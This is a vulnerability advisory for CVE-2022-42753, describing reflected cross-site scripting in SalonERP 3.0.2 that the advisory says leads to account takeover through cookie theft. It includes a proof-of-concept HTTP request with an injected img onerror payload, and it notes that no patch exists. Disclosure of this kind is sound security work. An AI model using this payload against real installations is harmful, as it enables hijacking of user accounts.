SalonERP 3.0.2 - XSS to Account Takeover
|Name||SalonERP 3.0.2 - XSS to Account Takeover|
|Affected versions||Version 3.0.2|
|Kind||Reflected cross-site scripting (XSS)|
|Rule||008. Reflected cross-site scripting (XSS)|
|CVSSv3 Base Score||8.8|
SalonERP version 3.0.2 allows an external attacker to steal the cookie of arbitrary users. This is possible because the application does not correctly validate the page parameter against XSS attacks.
The XSS present in SalonERP 3.0.2, allows an unauthenticated remote attacker to perform an Account Takeover. To trigger this vulnerability, we will need to send the following malicious link to an victim in order to hack their account:
POST /try/backend.php HTTP/2 Host: salonerp.sourceforge.io Cookie: salonerp-id=EnznqgZ8cAX2N7stbSLl; PHPSESSID=2f8c90c0e918726eed019427af65f438 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Origin: https://hacker.com Content-Type: application/x-www-form-urlencoded Content-Length: 61 what=settings<img+src=1+onerror="(alert)(document.cookie)" />
In this attack we will obtain the victim user account, through a malicious link.
Our security policy
We have reserved the CVE-2022-42753 to refer to these issues from now on.
Version: SalonERP 3.0.2
Operating System: GNU/Linux
There is currently no patch available for this vulnerability.
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
Vendor page https://salonerp.sourceforge.io/
Vendor replied acknowledging the report.